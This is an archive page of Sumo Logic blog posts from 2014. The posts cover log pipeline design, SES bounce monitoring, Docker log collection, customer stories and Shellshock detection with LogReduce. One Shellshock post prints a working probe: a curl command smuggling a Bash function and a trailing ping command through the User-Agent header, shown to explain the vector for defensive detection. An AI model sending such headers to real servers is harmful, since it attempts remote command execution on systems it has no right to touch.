

Cloud Log Management for Control Freaks

10.02.2014 | Posted by Bright Fulton

The following is a guest post from Bright Fulton, Director of Engineering Operations at Swipely.

Like other teams that value their time and focus, Swipely Engineering strongly prefers partnering with third party infrastructure, platform, and monitoring services. We don’t, however, like to be externally blocked while debugging an issue or asking a new question of our data. Is giving up control the price of convenience? It shouldn’t be. The best services do the heavy lifting for you while preserving flexibility. The key lies in how you interface with the service: stay in control of data ingest and code extensibility.

A great example of this principle is Swipely’s log management architecture. We’ve been happily using Sumo Logic for years. They have an awesome product and are responsive to their customers. That’s a strong foundation, but because logging is such a vital function, we retain essential controls while taking advantage of all the power that Sumo Logic provides.


Get the benefits

Infrastructure services have flipped our notion of stability: instead of being comforted by long uptime, we now see it as a liability. Instances start, do work for an hour, terminate. But where do the logs go? One key benefit of a well integrated log management solution is centralization: stream log data off transient systems and into a centralized service.

Once stored and indexed, we want to be able to ask questions of our logs, to react to them. Quick answers come from ad-hoc searches:

  • How many times did we see this exception yesterday?

  • Show me everything related to this request ID.

Next, we define scheduled reports to catch issues earlier and shift toward a strategic view of our event data.

  • Alert me if we didn’t process a heartbeat job last hour.

  • Send me a weekly report of which instance types have the worst clock skew.

Good cloud log management solutions make this centralization, searching, and reporting easy.


Control the data

It’s possible to get these benefits without sacrificing control of the data by keeping the ingest path simple: push data through a single transport agent and keep your own copy. Swipely’s logging architecture collects with rsyslog and processes with Logstash before forwarding everything to both S3 and Sumo Logic.

Swipely’s Logging Architecture

Put all your events in one agent and watch that agent.

You likely have several services that you want to push time series data to: logs, metrics, alerts. To solve each concern independently could leave you with multiple long running agent processes that you need to install, configure, and keep running on every system. Each of those agents will solve similar problems of encryption, authorization, batching, local buffering, back-off, updates. Each comes with its own idiosyncrasies and dependencies. That’s a lot of complexity to manage in every instance.

The lowest common denominator of these time series event domains is the log. Simplify by standardizing on one log forwarding agent in your base image. Use something reliable, widely deployed, open source. Swipely uses rsyslog, but more important than which one is that there is just one.
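For illustration, any process on the box can hand an event to that one agent through the standard syslog interface; the sketch below uses the stock logger utility, and the tag and key/value payload are made up:

# Hand an application event to the local syslog agent (rsyslog in Swipely's case);
# the tag and payload here are purely illustrative.
logger -t payments-api "request_id=abc123 status=500 duration_ms=842 msg=charge_failed"

Everything emitted this way rides the same forwarding path as the rest of your logs, which is the whole point.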

Tee time

It seems an obvious point, but control freaks shouldn’t need to export their data from third parties. Instead of forwarding straight to the external service, send logs to an aggregation server first. Swipely uses Logstash to receive the many rsyslog streams. In addition to addressing vendor integrations in one place, this point of centralization allows you to:

  • Tee your event stream. Different downstream services have different strengths. Swipely sends all logs to both Sumo Logic for search and reporting and to S3 for retention and batch jobs.

  • Apply real-time policies. Since Logstash sees every log almost immediately, it’s a great place to enforce invariants, augment events, and make routing decisions. For example, logs that come in without required fields are flagged (or dropped). We add classification tags based on source and content patterns. Metrics are sent to a metric service. Critical events are pushed to an SNS topic.


Control the code

The output is as important as the input. Now that you’re pushing all your logs to a log management service and interacting happily through search and reports, extend the service by making use of indexes and aggregation operators from your own code.

Wrap the API

Good log management services have good APIs and Sumo Logic has several. The Search Job API is particularly powerful, giving access to streaming results in the same way we’re used to in their search UI.

Swipely created the sumo-search gem in order to take advantage of the Search Job API. We use it to permit arbitrary action on the results of a search.
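For a sense of what the gem wraps, here is a minimal curl sketch against the Search Job API; the access ID/key, query, and time range are placeholders, and the gem takes care of polling the job and paging through results for you:

# Kick off a search job (a sketch; substitute your own credentials, query, and time range).
# The response contains a job ID you can poll for status and then page through results.
curl -s -u "ACCESS_ID:ACCESS_KEY" \
  -H "Content-Type: application/json" \
  -H "Accept: application/json" \
  -X POST https://api.sumologic.com/api/v1/search/jobs \
  -d '{"query": "_sourceCategory=prod/app error | count by _sourceHost", "from": "2014-10-01T00:00:00", "to": "2014-10-02T00:00:00", "timeZone": "UTC"}'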

Custom alerts and dashboards

Bringing searches into the comfort of the Unix shell is part of the appeal of a tool like this, but even more compelling is bringing them into code. For example, Swipely uses sumo-search from a periodic job to send alerts that are more actionable than just the search query results. We can select the most pertinent parts of the message and link in information from other sources. 

Engineers at Swipely start weekly tactical meetings by reporting trailing seven day metrics. For example: features shipped, slowest requests, error rates, analytics pipeline durations. These indicators help guide and prioritize discussion. Although many of these metrics are from different sources, we like to see them together in one dashboard. With sumo-search and the Search Job API, we can turn any number from a log query into a dashboard widget in a couple lines of Ruby.


Giving up control is not the price of SaaS convenience. Sumo Logic does the heavy lifting of log management for Swipely and provides an interface that allows us to stay flexible. We control data on the way in by preferring open source tools in the early stages of our log pipeline and saving everything we send to S3. We preserve our ability to extend functionality by making their powerful search API easy to use from both shell and Ruby.

We’d appreciate feedback (@swipelyeng) on our logging architecture. Also, we’re not really control freaks and would love pull requests and suggestions on sumo-search!

Vivek Kaushal

Debugging Amazon SES message delivery using Sumo Logic

10.02.2014 | Posted by Vivek Kaushal

 

We at Sumo Logic use Amazon SES (Simple Email Service) to send thousands of emails every day for things like search results, alerts, and account notifications. We need to monitor SES to ensure timely delivery and to know when emails bounce.

Amazon SES provides notifications about the status of each email via Amazon SNS (Simple Notification Service). Amazon SNS allows you to send these notifications to any HTTP endpoint. We ingest these messages using Sumo Logic’s HTTP Source.

Using these logs, we have identified problems such as scheduled searches that repeatedly send results to an invalid email address, and a Microsoft Office 365 outage discovered when a customer reported not receiving the sign-up email.

 

Here’s a step by step guide on how to send your Amazon SES notifications to Sumo Logic.

1. Set Up Collector. The first step is to set up a hosted collector in Sumo Logic that can receive logs via an HTTP endpoint. While setting up the hosted collector, we recommend providing an informative source category name, like “aws-ses”.

2. Add HTTP Source. After adding a hosted collector, you need to add an HTTP Source. Once an HTTP Source is added, it will generate a URL that will be used to receive notifications from SNS. The URL looks like https://collectors.sumologic.com/receiver/v1/http/ABCDEFGHIJK.
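You can sanity-check the endpoint before wiring up SNS by posting a test message to it; a sketch using the placeholder URL above:

# Post a test message to the HTTP Source; it should show up under the
# collector's source category within a minute or two.
curl -d "hello from the SES setup walkthrough" https://collectors.sumologic.com/receiver/v1/http/ABCDEFGHIJK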

3. Create SNS Topic. In order to send notifications from SES to SNS, we need to create an SNS topic. The following picture shows how to create a new SNS topic on the SNS console. We used “SES-Notifications” as the name of the topic in our example.

4. Create SNS Subscription. SNS allows you to send a notification to multiple HTTP Endpoints by creating multiple subscriptions within a topic. In this step we will create one subscription for the SES-Notifications topic created in step 3 and send notifications to the HTTP endpoint generated in step 2.
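If you prefer the command line to the console, steps 3 and 4 can also be done with the AWS CLI; a sketch, assuming the CLI is installed and configured, with the topic ARN and endpoint URL as placeholders:

# Create the topic (the command prints the new topic ARN).
aws sns create-topic --name SES-Notifications

# Subscribe the Sumo Logic HTTP Source URL from step 2 to the topic.
aws sns subscribe \
  --topic-arn arn:aws:sns:us-east-1:123456789012:SES-Notifications \
  --protocol https \
  --notification-endpoint https://collectors.sumologic.com/receiver/v1/http/ABCDEFGHIJK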

5. Confirm Subscription. After a subscription is created, Amazon SNS will send a subscription confirmation message to the endpoint. This subscription confirmation notification can be found in Sumo Logic by searching for: _sourceCategory=<name of the sourceCategory provided in step 1>

For example: _sourceCategory=aws-ses 

Copy the link from the logs and paste it in your browser.

6. Send SES notifications to SNS. Finally, configure SES to send notifications to SNS. To do this, go to the SES console and select the verified senders option on the left-hand side. In the list of verified email addresses, select the email address for which you want to configure the logs. The page looks like this:

On the above page, expand the notifications section and click edit notifications. Select the SNS topic you created in step 3.

 

7. Switch message format to raw (Optional). SES sends notifications to SNS in JSON format. Any notification sent through SNS is by default wrapped in a JSON envelope, which in this case produces a nested JSON message that is nearly unreadable. To avoid this, we highly recommend configuring SNS to use the raw message delivery option.
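Raw message delivery can be toggled per subscription in the SNS console, or via the AWS CLI; a sketch, with the subscription ARN as a placeholder:

# Enable raw message delivery so SES notifications arrive as plain JSON
# rather than being wrapped in an SNS envelope.
aws sns set-subscription-attributes \
  --subscription-arn arn:aws:sns:us-east-1:123456789012:SES-Notifications:11111111-2222-3333-4444-555555555555 \
  --attribute-name RawMessageDelivery \
  --attribute-value true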

Before setting raw message format

After setting raw message format

 

 

We used the JSON operator to parse the messages, as shown in the queries below:

1. Retrieve general information out of messages
_sourceCategory=aws-ses | json "notificationType", "mail", "mail.destination", "mail.destination[0]", "bounce", "bounce.bounceType", "bounce.bounceSubType", "bounce.bouncedRecipients[0]" nodrop

2. Identify most frequently bounced recipients
_sourceCategory=aws-ses AND !"notificationType\":\"Delivery" | json "notificationType", "mail.destination[0]" as type, destination nodrop | count by destination | sort by _count

Vera Chen

We are Shellshock Bash Bug Free Here at Sumo Logic, but What about You?

10.01.2014 | Posted by Vera Chen

Be Aware and Be Prepared

I am betting most of you have heard about the recent “Shellshock” Bash bug.  If not, here is why you should care: this bug affects users of Bash, one of the most popular utilities installed on operating systems today.  Discovered in early September 2014, this extremely severe bug affects Bash versions dating back to 1.13 and causes shell commands appended after function definitions to be executed, exposing systems to security threats.  The vulnerability allows remote attackers to execute arbitrary shell commands, gain access to internal data, publish malicious code, reconfigure environments, and exploit systems in countless ways.

Shellshock Bash Bug Free, Safe and Secure

None of the Sumo Logic service components were impacted due to the innate design of our systems.  However, for those of you out there who might have fallen victim to this bug based on your system architecture, you’ll want to jump in quickly to address potential vulnerabilities. 

What We Can Do for You

If you have been searching for a tool to expedite the process of identifying potential attacks on your systems, you’re in the right place!  I recommend that you consider Sumo Logic, and especially our pattern recognition capability, LogReduce.  Here is how it works: the search feature lets you search for the well-known “() {“ Shellshock indicator, and a touch of the LogReduce button surfaces potential malicious activity for you to consider.  Take, for instance, a large group of messages that could be a typical series of ping requests: LogReduce separates messages by their distinct signatures, making it easier for you to review those that differ from the norm.  You can easily see instances of scans, attempts, and real attacks separated into distinct groups.  This streamlines your investigation process to uncover abnormalities and potential attacks.  Give it a try and see for yourself how LogReduce can reveal a broad range of remote attacker activity, from downloads of malicious files to your systems, to internal file dumps staged for external retrieval, and more.

Witness it Yourself

Check out this video to see how our service enables you to proactively identify suspicious or malicious activity on your systems: Sumo Logic: Finding Shellshock Vulnerabilities

Give Us a Try

For those of you who are completely new to our service, you can sign up for a free 30-day trial here: Sumo Logic Free 30 Day Trial

 

Sanjay Sarathy, CMO

Why Do DevOps Shops Care About Machine Data Analytics?

09.30.2014 | Posted by Sanjay Sarathy, CMO

Introduction

The IT industry is always changing, and at the forefront today is the DevOps movement.  The whole idea of DevOps is centered around helping businesses become more responsive to user requests and adapt faster to market conditions. Successful DevOps rollouts count on the ability to rapidly diagnose application issues that are hidden in machine data. Thus, the ability to quickly uncover patterns and anomalies in your logs is paramount. As a result, DevOps shops are fast becoming a sweet spot for us. Yes, DevOps can mean so many things – lean IT methodologies, agile software development, programmable architectures, a sharing culture and more.  At the root of it all is data, especially machine data.

DevOps job trends have exploded onto the scene, as the graphic below indicates.

In the midst of this relatively recent boom, DevOps teams have been searching for tools that help them fulfill their requirements. Sumo Logic is a DevOps shop, and at DevOps Days in Austin we detailed our own DevOps scale-up. We covered everything from culture change to spreading knowledge to the issues that we faced. The result has been that our machine data analytics service is not only incredibly useful to us as a DevOps organization but also provides deep insights for any organization looking to optimize its processes.

Sumo Logic At Work In A DevOps Setting

The very notion of software development has been rocked to its core by DevOps, and that has been enabled by rapid analysis in the development lifecycle. Sumo Logic makes it possible to easily integrate visibility into any software infrastructure and monitor the effects of changes throughout development, test and production environments. Data analysis can now cast a wide net and with our custom dashboards and flexible integration, can take place anywhere you can put code. Rapid cause-and-effect, rapid error counts, and rapid analysis mean rapid software development and code updating. If user performance has been an issue, DevOps and Sumo Logic can address those experiences as well through analytic insight from relevant data sources in your environment. That makes for better software for your company and your customers. It also means happier developers and we know that hasn’t traditionally been an easy task.

Sumo Logic offers an enterprise-scale, cloud-based product that grows as a business grows. TuneIn, a well-known internet radio and podcast platform, utilizes Sumo Logic, and in a recent guest post their development teams shared how they used our technology to create custom searches and alerts for errors and exceptions in the logs, allowing them to reduce overall error rates by close to twenty percent. Another Sumo Logic customer, PagerDuty, shared their story of a rapid Sumo Logic DevOps deployment and reaching their ROI point in under a month:

Flexibility, speed, scalability, and extensibility: these are the kinds of qualities that DevOps shops look for in their commercial tools. Netskope is a cloud-based security company and a DevOps shop that has integrated Sumo Logic into its cloud infrastructure. In this video, they describe the value of Sumo Logic in providing instant feedback on the performance and availability of their application.

Today, DevOps teams around the world are using Sumo Logic to deliver the insights they need on demand. With Sumo Logic supporting DevOps teams throughout their application lifecycle, organizations are able to deliver on the promise of their applications and fulfill their business goals.

LogReduce vs Shellshock

09.25.2014 | Posted by Joan Pepin, VP of Security/CISO

 

Shellshock is the latest catastrophic vulnerability to hit the Internet. Following so closely on the heels of Heartbleed, it serves as a reminder of how dynamic information security can be.

(NOTE: Sumo Logic was not and is not vulnerable to this attack, and all of our BASH binaries were patched on Wednesday night.)

Land-Grab

Right now there is a massive land-grab going on, as dozens of criminal hacker groups (and others) are looking to exploit this widespread and serious vulnerability for profit. Patching this vulnerability while simultaneously sifting through massive volumes of data looking for signs of compromise is a daunting task for your security and operations teams. However, Sumo Logic’s patent pending LogReduce technology can make this task much easier, as we demonstrated this morning.

Way Big Data

While working with a customer to develop a query to show possible exploitation of Shellshock, we saw over 10,000 exploitation attempts in a fifteen minute window. It quickly became clear that a majority of the attempts were being made by their internal scanner. By employing LogReduce we were able to very quickly pick out the actual attack attempts from the data-stream, which allowed our customer to focus their resources on the boxes that had been attacked.

 

Fighting the Hydra

From a technical perspective, the Shellshock attack can be hidden in any HTTP header; we have seen it in the User-Agent, the Referrer, and as part of the GET request itself. Once invoked in this way, it can be used to do anything from sending a ping, to sending an email, to installing a trojan horse or opening a remote shell. All of which we have seen already today. And HTTP isn’t even the only vector, but rather just one of many which may be used, including DHCP.
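To make the vector concrete, here is a sketch of what a typical probe can look like on the wire; the target URL is hypothetical and the payload simply pings a host the attacker controls:

# Illustrative Shellshock probe: the Bash function definition followed by a trailing
# command is smuggled in through the User-Agent header of an ordinary request.
curl -A '() { :; }; /bin/ping -c 1 callback.example.com' http://www.example.com/cgi-bin/status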

So: Shellshock presents a highly flexible attack vector that can be employed in a number of ways to do a large variety of malicious things. It is so flexible that there is no single way to search for it or alert on it that will be completely reliable. There is no single silver bullet to slay this monster; however, LogReduce can quickly shine light on the situation and whittle it down to a much less monstrous scale.

We are currently seeing many different varieties of scanning, both innocent and not-so-innocent; as well as a wide variety of malicious behavior, from directly installing trojan malware to opening remote shells for attackers. This vulnerability is actively being exploited in the wild this very second. The Sumo Logic LogReduce functionality can help you mitigate the threat immediately.

Ben Newton, Senior Product Manager

Piercing the Fog in a Devops World

09.22.2014 | Posted by Ben Newton, Senior Product Manager

Fog on I-280

Two things still amaze me about the San Francisco Bay area two years on after moving here from the east coast – the blindingly blue, cloudless skies – and the fog. It is hard to describe how beautiful it is to drive up the spine of the San Francisco Peninsula on northbound I-280 as the fog rolls over the Santa Cruz mountains. You can see the fog pouring slowly over the peaks of the mountains, and see the highway in front of you disappear into the white, fuzzy nothingness of its inexorable progress down the valley. There is always some part of me that wonders what will happen to my car as I pass into the fog. But then I look at my GPS, know that I have driven this road hundreds of times, and assure myself that my house does still exist in there – somewhere.

The Viaduct

Now, I can contrast that experience with learning to drive in the Blue Ridge Mountains of North Carolina. Here’s the background – It’s only my second time behind the wheel, and my Mom takes me on this crazy stretch of road called the Viaduct. Basically, imagine a road hanging off the side of a mountain, with a sheer mountain side on the one side, and a whole lot of nothing on the other. Now, imagine that road covered in pea-soup fog with 10 ft visibility, and a line of a half dozen cars being led by a terrified teenager with white knuckled hands on the wheel of a minivan hoping he won’t careen off the side of the road to a premature death.  Completely different experience.

So, what’s the difference between those two experiences? Well, 20 years of driving, and GPS, for starters. I don’t worry about driving into the thick fog as I drive home because I have done it before: I know exactly where I am, how fast I am going, and I am confident that I can avoid obstacles. That knowledge, insight, and experience make all the difference between an awe-inspiring journey and a gut-wrenching nail-biter. This is really not that different from running a state-of-the-art application. Just as I need GPS and experience to brave the fog going home, the difference between confidently innovating and delighting your customers, versus living in constant fear of the next disaster, is driven by both technology and culture. Here are some ways I would flesh out the analogy:

GPS for DevOps

An app team without visibility into their metrics and errors is a team that will never do world-class operations. Machine Data Analytics provides the means to gather the telemetry data and then provide that insight in real-time. This empowers App Ops and DevOps teams to move more quickly and innovate.

Fog Lights for Avoiding Obstacles

You can’t avoid obstacles if you can’t see them in time. You need the right real-time analytics to quickly detect  issues and avoid them before they wreck your operations.

Experience Brings Confidence

If you have driven the road before, it always increases confidence and speed. Signature-based anomaly detection means that the time senior engineers put in to classify previous events gives the entire team the confidence to classify and debug issues.

 

So, as you drive your Application Operations and DevOps teams to push your application to the cutting edge of performance, remember that driving confidently into the DevOps fog is only possible with the right kind of visibility.

 

Images linked from:

  • http://searchresearch1.blogspot.com/2012/09/wednesday-search-challenge-9512-view-of.html
  • http://www.blueridgerunners.org/LinnCove.jpg
Mike Cook

Why TuneIn Chose Sumo Logic For Machine Data Analytics

09.15.2014 | Posted by Mike Cook

The following is a guest post from Mike Cook, Director of Technical Operations at TuneIn.

Introduction

TuneIn is a rapidly growing service that allows consumers to listen to over 100,000 radio stations and more than four million podcasts from every continent. During the recent soccer World Cup, over 10.5 million people listened live to the games on radio stations streamed via TuneIn, making it one of the biggest events in our company’s history.

The State of Machine Data Analytics, pre-Sumo Logic

We had no consolidated strategy for analyzing our logs across our systems and applications. As a result, and especially because of our rapid growth, troubleshooting and event correlation became manual and increasingly painful affairs that involved looking at individual server and application logs. We tried internal tools including syslog-ng and rsyslog, but the maintenance and overhead costs on a lean IT team were too high.

Why Sumo Logic?

There were a number of reasons why Sumo Logic was appealing to us:

  • As a cloud-based service, Sumo Logic immediately offloaded the maintenance issues we had to deal with running our own home-grown log management infrastructure.
  • With pre-built support for a number of infrastructure components that TuneIn runs on, including AWS, Cisco, VMware, Windows/IIS and Linux, we were confident that we could get insights around our logs far faster than other options.
  • In addition, the Sumo Logic LogReduce technology provided a more robust investigation tool to find root causes of issues that traditional monitoring tools just can’t detect.
  • Finally, Sumo Logic provides compelling business value for what we are trying to accomplish.

Internal Adoption of Sumo Logic

We started with creating basic dashboards and alerts around our key operating system logs. As the application development teams realized the value of what Sumo Logic could provide them, we added additional log sources and launched a series of lunch-and-learns to demonstrate the value of the service. These lunch-and-learns have rapidly broadened the adoption of Sumo Logic across TuneIn. We’re now seeing support teams using it to get customer statistics; different development teams using it to analyze API performance; and the executive team getting overall visibility through real-time dashboards.

Business Benefits

It didn’t take us long to see the benefit of Sumo Logic. Since TuneIn is a distributed PaaS, it was frequently difficult to correlate and troubleshoot issues in a particular API. Time to resolution has dropped from several hours to several minutes now that developer and operations staff can search and pinpoint issues. Our development teams were quick to create custom searches and alerts for errors and exceptions in the logs, allowing us to reduce overall error rates by close to 20%. Without Sumo Logic we wouldn’t have known most of those errors were occurring. We’re just scratching the surface with Sumo Logic. We continue to expand our usage and gain critical insight into API performance, what our most popular user activities are, and where our application bottlenecks are. Sumo Logic isn’t just a log consolidation tool; it also serves as a critical tool in our Business Intelligence toolbox.

Dwayne Hoover, Senior Sales Engineer

Four Ways to Collect Docker Logs in Sumo Logic

09.03.2014 | Posted by Dwayne Hoover, Senior Sales Engineer

Docker is incredibly popular right now and is changing the way sysadmins, developers and engineers go about their day to day lives.  This walkthrough isn’t going to introduce you to Docker, I’ll assume that you know what it is and how to use it.  If not, don’t worry, here is a great place to start: What is Docker?

With Sumo Logic’s firm entrenchment in the DevOps and cloud culture, it’s no surprise that a large number of our customers are utilizing Docker.  Some are already pushing their Docker-related logs and machine data to Sumo Logic; others have reached out with interesting use cases, asking for guidance and best practices on getting their valuable machine data into Sumo Logic.  This post will walk you through a few scenarios, each of which ultimately gets your machine data into one centralized location for troubleshooting and monitoring.

Four (OK, Five) Ways to Push Your Logs from Docker into Sumo Logic

  1. Install a Sumo Logic collector per container
  2. Collect local JSON logs from the host
  3. Stream the live logs from your container to a Sumo Logic HTTP endpoint
  4. Bind your containers to a volume on the host and collect from there
  5. *BONUS* Install a collector running in a helper container

Install a Sumo Logic Collector per Container

Before the Docker purists jump all over this one, let me clarify that I’m fully aware this method may invoke some heated debate.  If you believe in strictly one application or service per container, then skip to the next method.  Otherwise, thanks for sticking around.

In this approach, we will install an ephemeral collector as part of a container build, deploy a sumo.conf file to provide authentication (and other information) and optionally, deploy a sources.json file to provide paths to log files.

Here is an example Dockerfile to accomplish this task.  Note, I deployed MongoDB as an example application, but this could represent any application, just modify accordingly.

# Sumo Logic docker
# VERSION 0.3
# Adjusted to follow approach outlined here:
# http://paislee.io/how-to-add-sumologic-to-a-dockerized-app/
FROM phusion/baseimage:latest
MAINTAINER Dwayne Hoover
ADD https://collectors.sumologic.com/rest/download/deb/64 /tmp/collector.deb
ADD sumo.conf /etc/sumo.conf
# ADD sources.json /etc/sources.json

# ensure that the collector gets started when you launch
ADD start_sumo /etc/my_init.d/start_sumo
RUN chmod 755 /etc/my_init.d/start_sumo

# this start_sumo file should look something like this (minus the comments)
# #!/bin/bash
# service collector start

# install deb
RUN dpkg -i /tmp/collector.deb

# let’s install something
# put your own application here
RUN apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv 7F0CEB10
RUN echo 'deb http://downloads-distro.mongodb.org/repo/ubuntu-upstart dist 10gen' | tee /etc/apt/sources.list.d/mongodb.list
RUN apt-get update
RUN apt-get install -y -q mongodb-org
# Create the MongoDB data directory
RUN mkdir -p /data/db
EXPOSE 27017

# ensure that mongodb gets started when you launch
ADD start_mongo /etc/my_init.d/start_mongo
RUN chmod 755 /etc/my_init.d/start_mongo

CMD /sbin/my_init

It’s worth noting that the container will start the services specified in the scripts deployed to your /etc/my_init.d directory by issuing the /sbin/my_init command at container launch.  Unless otherwise specified, logs will go straight to STDOUT and will not be available via a file path from the Sumo Logic UI using the collector that you just installed.  However, you can add logs from /var/log just as if it were a standard Linux image:

docker source 1

Let’s add the Sumo Logic collector logs as well:

docker source 2 

And now, we have log data flowing in:

docker collectors status

Simply add the additional paths that you are interested in gathering machine data from and it will flow into your Sumo Logic account while the container is running. 

Collect Local JSON Logs From the Docker Host

If you would like to see all of the log data from all of your containers, it’s as easy as installing a collector on the Docker host and pointing it to the directory containing the container logs.  Follow the instructions here to deploy a collector.

Once installed and registered, point it to the Docker logs:

docker source local

The default path for the Docker logs is: /var/lib/docker/containers/[container id]/[container-id]-json.log
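A quick way to confirm the path for a given container (the container name below is the one from the earlier example):

# Resolve the full container ID and peek at the last few JSON-formatted log lines.
CONTAINER_ID=$(docker inspect --format '{{.Id}}' mongo_instance_002)
sudo tail -n 3 /var/lib/docker/containers/$CONTAINER_ID/$CONTAINER_ID-json.log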

These logs are in JSON format and are easily parsed using our anchor based parse or JSON operator.  For more information, see the following:

http://help.sumologic.com/Help/Default.htm#Parse__Anchor_.htm
http://help.sumologic.com/Help/Default.htm#JSON_Operator.htm

Stream the Live Logs From a Container to a Sumo Logic HTTP Endpoint

If you don’t want to install a collector, you can use a “Hosted Collector” and push your log messages from a container to your unique HTTP endpoint.  This is done on the Docker host and utilizes the “docker logs” command.

 First, configure a hosted collector with a HTTP Source:
http://help.sumologic.com/Help/Default.htm#Setting_up_a_Hosted_Collector.htm
http://help.sumologic.com/Help/Default.htm#Configuring_an_HTTP_Source.htm

add new collector

 

HTTP Source

The basic steps here are to choose “Add Collector”, then “Hosted Collector”, and then choose “Add Source”, selecting HTTP.  Once the source metadata is entered, you will be provided a unique URL that can accept incoming data via HTTP POST.  Scripting a basic wrapper around curl will do the trick.  Here is an example:

#!/bin/bash
URL="https://collectors.sumologic.com/receiver/v1/http/[your unique URL]"
while read data;
do
     curl --data "$data" "$URL"
done

Edit the URL variable to match the unique URL you obtained when setting up the HTTP source. 

Using the docker logs command, you can follow the STDOUT data that your container is generating.  Assuming that we named our curl wrapper “watch-docker.sh” and we are running a container named “mongo_instance_002” we could issue a command like:

nohup sh -c 'docker logs --follow=true --timestamps=true mongo_instance_002 | ./watch-docker.sh' &

 While the container is running, its output will be sent directly to Sumo Logic.  Note that “follow” is set to true.  This ensures that we are collecting a live stream of the STDOUT data from the container.  I’ve also chosen to turn on timestamps so that Sumo Logic will use the timestamp from the docker logs command when the data is indexed. 

For more information on docker logs, go here.

Bind Your Containers to a Volume on the Host and Collect There

Docker provides the ability to mount a volume on the host to the container.  Without getting into too much detail about how to achieve this (different methods may be applicable for your needs), check out the Docker documentation here:

https://docs.docker.com/userguide/dockervolumes/

Assuming that your dockerized applications are logging to a predefined directory and that directory is mounted to the host filesystem, you can install a Sumo Logic collector on your Docker host and create a new source that monitors the shared volume that you are logging to.
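As a sketch, assuming your application writes its logs to /var/log/myapp inside the container, a host bind mount might look like this (the image name and paths are illustrative):

# Mount a host directory into the container so application logs land on the
# host filesystem, where the Sumo Logic collector can pick them up.
docker run -d --name myapp \
  -v /srv/logs/myapp:/var/log/myapp \
  myapp-image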

Again, the instructions for setting up a collector and sources can be found here.

There are some concerns that this could open up a potential attack vector if your container is compromised, so please ensure that the necessary security measures have been put into place.  For internal use cases on an already secured environment, this is likely a non-factor.

*BONUS* Install a Collector Running in a “Helper” Container

Borrowing from Caleb Sotelo’s post, it’s possible to stick to the “one process, one container” mentality and run a Sumo Logic collector within its own Docker container.

You can create a container that only contains a Sumo Logic collector.  Assuming that this container has the ability to see other containers in your Docker environment, you can configure data sources to pull logs from other containers.  This can be done over SSH using remote sources in Sumo Logic or by utilizing shared volumes and using Local File sources.

Setting up remote sources requires SSH access either via a shared key or username/password combo.  Here is some additional detail on setting up remote sources.
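For the shared-volume alternative, a sketch might look like the following (image names are illustrative): expose the app’s log directory as a volume, give the collector container access to it with --volumes-from, and configure a Local File source pointing at that path.

# App container exposes its log directory as a volume...
docker run -d --name myapp -v /var/log/myapp myapp-image

# ...and the collector container mounts the same volumes.
docker run -d --name sumo-collector \
  --volumes-from myapp \
  sumo-collector-image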

Please note, this is dependent upon the configuration of your Docker environment supporting communication between containers via SSH or shared volumes and is a bit out of scope for this walkthrough.  For some additional information, check these out:

Docker’s instructions on setting up volumes
The phusion baseimage that includes the SSH daemon and server

Caleb Sotelo

How To Add Sumo Logic To A Dockerized App

08.27.2014 | Posted by Caleb Sotelo

This is a guest post from Caleb Sotelo who is a software engineer at OpenX and has been reprinted with his permission.  You can view the original here.  

kuniyoshi_utagawa_the_sumo_wrestler

Sumo Logic is a nifty service that makes it easy to watch and analyze your apps’ logs. You install a collector local to the app in question, point it at some files to watch, and your logs are sent to the cloud, where they can be sliced and diced from a nice web UI.

At a high level, Sumo Logic wants to transform big data logs into operational information. But at a practical level, it’s nice not to have to SSH to a production machine and tail or grep enormous files to take your app’s pulse. Not to mention the idea is totally in line with one of the Twelve Factors: treating logs as event streams enables better understanding of an app’s behavior over time.

I’ve had success using Sumo Logic at OpenX, so I wanted to give their free tier a shot for a personal project. The only limitations are a 500 MB-per-day data cap and 7 days of retention. I was surprised not to find anything on the web about installing Sumo Logic alongside a Dockerized app, and I had a couple of Docker-based candidates. So without further ado, here’s how to add Sumo Logic to a Dockerized app:

1. Sign up for Sumo Logic Free

Head over to sumologic.com/signup to sign up. The only catch here is that you’ll need a company email address. For the project I’m going to use SumoLogic for, I own and manage my own domain, so it wasn’t too much trouble to create an email address using my registrar’s mail service. Since I host the domain separately, I did have to add an MX record to my zone file to point to the registrar’s mail server. For example, with DigitalOcean.

2. Download a Collector

Once you confirm your email address and log in, you’ll be stepped through a process for downloading and installing a collector. I chose the Installed Collector and downloaded sumocollector_19.91-2_amd64.deb, because my Docker image is based on Ubuntu.

sumo_logic_choose_collector_screenshot

After downloading the collector, the setup wizard proceeds to a screen that spins until it detects a newly installed collector. I didn’t yet know how I was going to install it, and I got logged out of Sumo Logic anyway due to inactivity, so I abandoned the wizard at that point. The Sumo Logic UI changed itself as soon as it detected that my first collector had been installed.

  • As I plan to install the Sumo Logic collector during the docker build process, I uploaded the .deb file to a Dropbox and grabbed the public link to use later.

3. Create Access Keys

When a collector client is installed it has to have some way of authenticating to the Sumo Logic server. The docs for creating a sumo.conf file (we’ll get there soon) offer two choices: (1) provide your Sumo Logic email and password, or (2) provide access keys generated from the UI. The latter is recommended if only to avoid storing a username/password in plaintext. Keys can be generated from Manage → Collectors → Access Keys → Create.

4. Augment your Docker Container

Here’s the Docker-specific part of installing Sumo Logic. We’ll add some lines to our app’s Dockerfile and author two files that are ADDed to the container during a docker build. I assume working knowledge of Docker, but here is the list of Dockerfile commands for good measure.

4.1 Create sumo.conf

First create a sumo.conf file like the following:

name={collector_name}  
accessid={your_access_id}  
accesskey={your_access_key}  

 

where name is an arbitrary name for this collector, and accessid and accesskey are those generated in step 3. There are many more conf options specified here but the important ones, namely sources, can actually be configured through the UI later on.

By convention I put Docker-specific files into .docker/{resource}, so this one goes to .docker/sumo/sumo.conf. It’ll be referenced in our Dockerfile shortly.

4.2 Modify your Dockerfile

Add a block like the following to your Dockerfile (assumed to live in the root of your app’s code), preferably before your actual app is added:

# install sumologic
RUN apt-get -qq update  
RUN apt-get install -y wget  
RUN wget https://www.dropbox.com/path/to/sumocollector_19.91-2_amd64.deb  
RUN dpkg -i sumocollector_19.91-2_amd64.deb  
RUN rm sumocollector_19.91-2_amd64.deb  
ADD .docker/sumo/sumo.conf /etc/sumo.conf  
ADD .docker/sumo/start_sumo /etc/my_init.d/start_sumo  

 

Let’s break this down:

RUN apt-get -qq update  

Update sources. This may not be necessary, but I like to put this before each dependency installed by my Dockerfile to avoid issues with image caching.

RUN apt-get install -y wget  
RUN wget https://www.dropbox.com/path/to/sumocollector_19.91-2_amd64.deb  

We’ll use wget to grab the collector file we uploaded in step 2. You may opt to ADD the file locally, but this option avoids having to check the resource into your app’s source code, while housing it in a consistent location. Better practice would be to store it in some kind of artifact repository and version it.

